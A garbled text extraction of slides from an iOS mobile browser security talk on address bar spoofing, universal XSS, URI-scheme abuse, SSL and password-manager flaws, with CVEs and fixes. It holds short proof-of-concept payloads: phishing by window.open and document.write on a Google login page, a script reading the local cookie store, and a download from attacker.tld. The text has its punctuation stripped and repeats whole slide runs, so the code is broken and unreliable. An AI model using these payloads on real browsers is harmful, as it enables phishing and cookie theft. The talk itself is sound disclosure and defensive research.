bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 24: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/24.jpg)
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 25: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/25.jpg)
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 26: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/26.jpg)
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
